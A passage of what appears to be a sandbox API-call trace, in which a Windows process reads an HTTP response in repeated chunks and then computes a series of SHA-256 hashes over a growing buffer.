lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.917] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.917] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x73f00) returned 0x32ac5770 [0174.918] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.918] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.933] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x75f00) returned 0x32ac5770 [0174.933] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.933] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.933] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x77f00) returned 0x32ac5770 [0174.933] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.933] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.934] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x79f00) returned 0x32ac5770 [0174.934] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.934] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.934] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7bf00) returned 0x32ac5770 [0174.934] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.935] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.942] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7df00) returned 0x32ac5770 [0174.942] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b4166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b4166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.942] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.943] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x7ff00) returned 0x32945720 [0174.950] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329c361e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329c361e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.950] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.950] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x81f00) returned 0x32945720 [0174.950] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329c561e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329c561e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.951] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.951] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x83f00) returned 0x32945720 [0174.951] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329c761e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329c761e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.951] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.229] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x85f00) returned 0x32945720 [0175.229] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329c961e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329c961e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.230] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.230] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x87f00) returned 0x32945720 [0175.230] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329cb61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329cb61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.230] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.231] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x89f00) returned 0x32945720 [0175.231] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329cd61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329cd61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.231] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.232] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x8bf00) returned 0x32945720 [0175.232] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329cf61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329cf61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.232] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.243] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x8df00) returned 0x32945720 [0175.243] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329d161e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329d161e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.243] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.243] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x8ff00) returned 0x32945720 [0175.244] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329d361e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329d361e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.244] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.244] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x91f00) returned 0x32945720 [0175.244] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329d561e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329d561e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.244] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.244] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x93f00) returned 0x32945720 [0175.244] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329d761e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329d761e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.244] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.523] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x95f00) returned 0x32945720 [0175.523] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329d961e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329d961e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.523] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.524] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x97f00) returned 0x32945720 [0175.524] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329db61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329db61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.524] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.524] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x99f00) returned 0x32945720 [0175.525] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329dd61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329dd61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.525] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.525] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x9bf00) returned 0x32945720 [0175.525] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329df61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329df61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.525] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.541] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x9df00) returned 0x32945720 [0175.541] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329e161e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329e161e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.542] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.542] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0x9ff00) returned 0x32945720 [0175.542] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329e361e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329e361e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.542] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.543] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xa1f00) returned 0x32945720 [0175.543] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329e561e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329e561e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.543] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.543] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xa3f00) returned 0x32945720 [0175.544] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329e761e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329e761e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.544] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.814] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xa5f00) returned 0x32945720 [0175.814] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329e961e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329e961e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.814] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.814] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xa7f00) returned 0x32945720 [0175.814] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329eb61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329eb61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.815] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.815] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xa9f00) returned 0x32945720 [0175.815] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329ed61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329ed61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.815] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.815] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xabf00) returned 0x32945720 [0175.816] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329ef61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329ef61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.816] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.835] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xadf00) returned 0x32945720 [0175.835] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329f161e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329f161e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.836] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.836] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xaff00) returned 0x32945720 [0175.836] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329f361e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329f361e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.836] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.837] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xb1f00) returned 0x32945720 [0175.837] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329f561e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329f561e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.837] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.838] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xb3f00) returned 0x32945720 [0175.838] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329f761e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329f761e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.838] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.884] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xb5f00) returned 0x32945720 [0175.885] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329f961e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329f961e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.885] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.886] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xb7f00) returned 0x32945720 [0175.886] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329fb61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329fb61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.887] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.887] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xb9f00) returned 0x32945720 [0175.888] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329fd61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329fd61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.888] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0175.889] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xbbf00) returned 0x32945720 [0175.889] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x329ff61e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x329ff61e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0175.889] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x272) returned 1 [0175.890] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32945720, Size=0xbc170) returned 0x32945720 [0175.890] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32a0161e, dwNumberOfBytesToRead=0x272, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32a0161e*, lpdwNumberOfBytesRead=0xcd714*=0x272) returned 1 [0175.890] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x0) returned 1 [0175.890] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e41af0 [0175.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e5fa80 [0175.894] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0175.895] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.895] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x20, dwFlags=0x0) returned 1 [0175.895] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.895] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67630 [0175.895] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67630, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67630, pdwDataLen=0xcdfdc) returned 1 [0175.895] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.895] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0175.895] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0175.896] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.896] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x40, dwFlags=0x0) returned 1 [0175.896] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.896] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66fa0 [0175.896] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66fa0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66fa0, pdwDataLen=0xcdfdc) returned 1 [0175.896] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.896] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0175.896] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0175.897] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.897] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x60, dwFlags=0x0) returned 1 [0175.897] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67390 [0175.897] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67390, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67390, pdwDataLen=0xcdfdc) returned 1 [0175.897] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.897] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0175.897] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.897] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.897] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x80, dwFlags=0x0) returned 1 [0175.897] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67060 [0175.897] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e67060, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67060, pdwDataLen=0xcdfdc) returned 1 [0175.897] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.897] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.897] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.898] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.898] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0175.898] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.898] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67150 [0175.898] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67150, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67150, pdwDataLen=0xcdfdc) returned 1 [0175.898] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.898] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.898] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0175.898] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.899] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0175.899] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.899] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e673f0 [0175.899] CryptGetHashParam (in: hHash=0x332b7a50, 